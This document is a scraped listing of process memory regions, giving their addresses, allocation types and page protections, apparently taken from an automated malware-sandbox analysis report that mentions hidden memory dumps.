||
|
747B000
|
stack
|
page read and write
|
||
|
7755000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
7B50000
|
heap
|
page read and write
|
||
|
6288000
|
heap
|
page read and write
|
||
|
1E2CCF37000
|
heap
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
4E40000
|
trusted library allocation
|
page read and write
|
||
|
1E2B68F6000
|
trusted library allocation
|
page read and write
|
||
|
21FA0000
|
heap
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C9E000
|
stack
|
page read and write
|
||
|
431F67F000
|
stack
|
page read and write
|
||
|
75D0000
|
heap
|
page execute and read and write
|
||
|
21A8E000
|
stack
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
7F340000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E2CCD71000
|
heap
|
page read and write
|
||
|
1E2B2C96000
|
heap
|
page read and write
|
||
|
757A000
|
stack
|
page read and write
|
||
|
1E2B2E00000
|
heap
|
page read and write
|
||
|
8E70000
|
direct allocation
|
page read and write
|
||
|
6465000
|
heap
|
page read and write
|
||
|
5843000
|
trusted library allocation
|
page read and write
|
||
|
21ACF000
|
stack
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
75D5000
|
heap
|
page execute and read and write
|
||
|
4D9F000
|
stack
|
page read and write
|
||
|
3450000
|
trusted library allocation
|
page read and write
|
||
|
348D000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2B691B000
|
trusted library allocation
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page read and write
|
||
|
62EB000
|
heap
|
page read and write
|
||
|
21BE0000
|
remote allocation
|
page read and write
|
||
|
21520000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2B2CB1000
|
heap
|
page read and write
|
||
|
21D04000
|
direct allocation
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
21CBB000
|
stack
|
page read and write
|
||
|
2FCE000
|
stack
|
page read and write
|
||
|
1E2B4FE4000
|
trusted library allocation
|
page read and write
|
||
|
7935000
|
heap
|
page read and write
|
||
|
431F9B8000
|
stack
|
page read and write
|
||
|
1E2CCCF4000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
431F936000
|
stack
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
769B000
|
stack
|
page read and write
|
||
|
1E2B53DF000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
6710000
|
direct allocation
|
page read and write
|
||
|
884E000
|
stack
|
page read and write
|
||
|
6334000
|
heap
|
page read and write
|
||
|
431F4FE000
|
stack
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2CCF10000
|
heap
|
page read and write
|
||
|
63ED000
|
stack
|
page read and write
|
||
|
32B9000
|
heap
|
page read and write
|
||
|
1E2CCF88000
|
heap
|
page read and write
|
||
|
1E2C4E30000
|
trusted library allocation
|
page read and write
|
||
|
1E2B4B41000
|
trusted library allocation
|
page read and write
|
||
|
7D7E000
|
stack
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
9D12BFF000
|
stack
|
page read and write
|
||
|
1B349860000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
1E2B6A98000
|
trusted library allocation
|
page read and write
|
||
|
3425000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E2B6985000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1E2B6949000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCC8C000
|
heap
|
page read and write
|
||
|
1E2B4D6D000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
642F000
|
stack
|
page read and write
|
||
|
1E2C4E3F000
|
trusted library allocation
|
page read and write
|
||
|
1E2B2DC0000
|
trusted library allocation
|
page read and write
|
||
|
1E2B49F0000
|
trusted library allocation
|
page read and write
|
||
|
3460000
|
heap
|
page readonly
|
||
|
7C5E000
|
stack
|
page read and write
|
||
|
521B000
|
trusted library allocation
|
page read and write
|
||
|
7DF428440000
|
trusted library allocation
|
page execute and read and write
|
||
|
3420000
|
trusted library allocation
|
page read and write
|
||
|
5E5C000
|
remote allocation
|
page execute and read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
431F77C000
|
stack
|
page read and write
|
||
|
8C5C000
|
stack
|
page read and write
|
||
|
1E2B5382000
|
trusted library allocation
|
page read and write
|
||
|
432060F000
|
stack
|
page read and write
|
||
|
2F08000
|
stack
|
page read and write
|
||
|
8943000
|
heap
|
page read and write
|
||
|
743D000
|
stack
|
page read and write
|
||
|
431F47E000
|
stack
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
432068E000
|
stack
|
page read and write
|
||
|
341A000
|
trusted library allocation
|
page execute and read and write
|
||
|
6280000
|
heap
|
page read and write
|
||
|
1E2B536A000
|
trusted library allocation
|
page read and write
|
||
|
1E2B45B0000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2B2DF0000
|
heap
|
page read and write
|
||
|
1E2B2CD2000
|
heap
|
page read and write
|
||
|
880D000
|
stack
|
page read and write
|
||
|
1E2B2BE0000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
4FDE000
|
stack
|
page read and write
|
||
|
21510000
|
direct allocation
|
page read and write
|
||
|
4ED8000
|
heap
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
21D28000
|
direct allocation
|
page read and write
|
||
|
3516000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
8E20000
|
direct allocation
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page read and write
|
||
|
1E2B2CFD000
|
heap
|
page read and write
|
||
|
432070D000
|
stack
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
33FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DEB000
|
stack
|
page read and write
|
||
|
1E2B5384000
|
trusted library allocation
|
page read and write
|
||
|
1E2B4FFA000
|
trusted library allocation
|
page read and write
|
||
|
1E2B5DDF000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
405C000
|
remote allocation
|
page execute and read and write
|
||
|
1E2B4FD4000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21C5F000
|
stack
|
page read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
21530000
|
direct allocation
|
page read and write
|
||
|
219CE000
|
stack
|
page read and write
|
||
|
1E2B6400000
|
trusted library allocation
|
page read and write
|
||
|
2ECC000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
7C1E000
|
stack
|
page read and write
|
||
|
1E2C4B41000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2B692E000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCF07000
|
heap
|
page execute and read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
1E2B2D20000
|
heap
|
page read and write
|
||
|
1E2CCCC5000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
343A000
|
heap
|
page read and write
|
||
|
1E2B4B30000
|
heap
|
page read and write
|
||
|
431F1CE000
|
stack
|
page read and write
|
||
|
8C9E000
|
stack
|
page read and write
|
||
|
21D24000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2CCD50000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2CCFEE000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
6450000
|
heap
|
page readonly
|
||
|
8E00000
|
direct allocation
|
page read and write
|
||
|
88E8000
|
heap
|
page read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCC98000
|
heap
|
page read and write
|
||
|
7910000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
4DFC000
|
stack
|
page read and write
|
||
|
1E2B6989000
|
trusted library allocation
|
page read and write
|
||
|
21D20000
|
direct allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
357C000
|
heap
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
8777000
|
stack
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D10000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
60C1000
|
trusted library allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
8E40000
|
direct allocation
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
8971000
|
heap
|
page read and write
|
||
|
4F5E000
|
stack
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2C4B50000
|
trusted library allocation
|
page read and write
|
||
|
21D20000
|
direct allocation
|
page read and write
|
||
|
21BE0000
|
remote allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
8B70000
|
trusted library allocation
|
page read and write
|
||
|
1E2B6426000
|
trusted library allocation
|
page read and write
|
||
|
50C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
4A5C000
|
remote allocation
|
page execute and read and write
|
||
|
A2BC000
|
direct allocation
|
page execute and read and write
|
||
|
8E30000
|
direct allocation
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCFE7000
|
heap
|
page read and write
|
||
|
34DE000
|
stack
|
page read and write
|
||
|
6720000
|
heap
|
page read and write
|
||
|
4DA8000
|
trusted library allocation
|
page read and write
|
||
|
8E10000
|
direct allocation
|
page read and write
|
||
|
1E2B6B77000
|
trusted library allocation
|
page read and write
|
||
|
1E2B53BB000
|
trusted library allocation
|
page read and write
|
||
|
1E2B2D01000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2C4B61000
|
trusted library allocation
|
page read and write
|
||
|
1E2B2C1D000
|
heap
|
page read and write
|
||
|
1E2B4FCC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
98BC000
|
direct allocation
|
page execute and read and write
|
||
|
33D0000
|
trusted library section
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
1E2B699A000
|
trusted library allocation
|
page read and write
|
||
|
62F2000
|
heap
|
page read and write
|
||
|
7A01000
|
heap
|
page read and write
|
||
|
1E2B53A5000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCFDD000
|
heap
|
page read and write
|
||
|
1E2B4FD0000
|
trusted library allocation
|
page read and write
|
||
|
6460000
|
heap
|
page read and write
|
||
|
4E90000
|
heap
|
page read and write
|
||
|
62E2000
|
heap
|
page read and write
|
||
|
1B349840000
|
heap
|
page read and write
|
||
|
79E9000
|
heap
|
page read and write
|
||
|
21500000
|
direct allocation
|
page read and write
|
||
|
1E2B46A5000
|
heap
|
page read and write
|
||
|
1B349AF4000
|
heap
|
page read and write
|
||
|
1E2CCF2C000
|
heap
|
page read and write
|
||
|
8DA0000
|
direct allocation
|
page read and write
|
||
|
66F0000
|
direct allocation
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
893F000
|
heap
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
75C8000
|
trusted library allocation
|
page read and write
|
||
|
8E50000
|
direct allocation
|
page read and write
|
||
|
1E2CCF9C000
|
heap
|
page read and write
|
||
|
3410000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
9D1279D000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
4E3E000
|
stack
|
page read and write
|
||
|
1E2B503B000
|
trusted library allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
431FBBF000
|
stack
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B349AF0000
|
heap
|
page read and write
|
||
|
7A22000
|
heap
|
page read and write
|
||
|
62F6000
|
heap
|
page read and write
|
||
|
7BBA000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2B4FC4000
|
trusted library allocation
|
page read and write
|
||
|
79F1000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
33F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F1E000
|
stack
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
7CDD000
|
stack
|
page read and write
|
||
|
5845000
|
trusted library allocation
|
page read and write
|
||
|
3A50000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
8DB0000
|
direct allocation
|
page read and write
|
||
|
7710000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
3F20000
|
remote allocation
|
page execute and read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
7B97000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1B349760000
|
heap
|
page read and write
|
||
|
21CF0000
|
stack
|
page read and write
|
||
|
1E2CCF00000
|
heap
|
page execute and read and write
|
||
|
21B3E000
|
stack
|
page read and write
|
||
|
1E2B690A000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCC50000
|
heap
|
page read and write
|
||
|
1E2CD00C000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
2194D000
|
stack
|
page read and write
|
||
|
585B000
|
trusted library allocation
|
page read and write
|
||
|
3409000
|
trusted library allocation
|
page read and write
|
||
|
5871000
|
trusted library allocation
|
page read and write
|
||
|
1E2B2C10000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
9D12AFF000
|
unkown
|
page read and write
|
||
|
218CE000
|
stack
|
page read and write
|
||
|
8DD0000
|
direct allocation
|
page read and write
|
||
|
88A0000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
8DF0000
|
direct allocation
|
page read and write
|
||
|
431FABE000
|
stack
|
page read and write
|
||
|
432078B000
|
stack
|
page read and write
|
||
|
8CDC000
|
stack
|
page read and write
|
||
|
349E000
|
unkown
|
page read and write
|
||
|
1E2B2CBC000
|
heap
|
page read and write
|
||
|
1B349AF5000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
21B7D000
|
stack
|
page read and write
|
||
|
1E2B6917000
|
trusted library allocation
|
page read and write
|
||
|
2198C000
|
stack
|
page read and write
|
||
|
7964000
|
heap
|
page read and write
|
||
|
1E2B51FF000
|
trusted library allocation
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
545C000
|
remote allocation
|
page execute and read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
66E0000
|
direct allocation
|
page read and write
|
||
|
79F9000
|
heap
|
page read and write
|
||
|
6353000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
1B349980000
|
heap
|
page read and write
|
||
|
431F5BF000
|
stack
|
page read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
8B15000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
5128000
|
trusted library allocation
|
page read and write
|
||
|
88F2000
|
heap
|
page read and write
|
||
|
1E2CCC89000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
66D0000
|
direct allocation
|
page read and write
|
||
|
612E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
431F57E000
|
stack
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
21D10000
|
direct allocation
|
page read and write
|
||
|
21AE0000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
8947000
|
heap
|
page read and write
|
||
|
8B60000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
6430000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
431FC3B000
|
stack
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
21F40000
|
heap
|
page read and write
|
||
|
1E2B6A14000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
7945000
|
heap
|
page read and write
|
||
|
1E2B45D0000
|
trusted library allocation
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
75BD000
|
stack
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
9780000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
431F7F7000
|
stack
|
page read and write
|
||
|
6364000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
376F000
|
unkown
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
753D000
|
stack
|
page read and write
|
There are 521 hidden memdumps, click here to show them.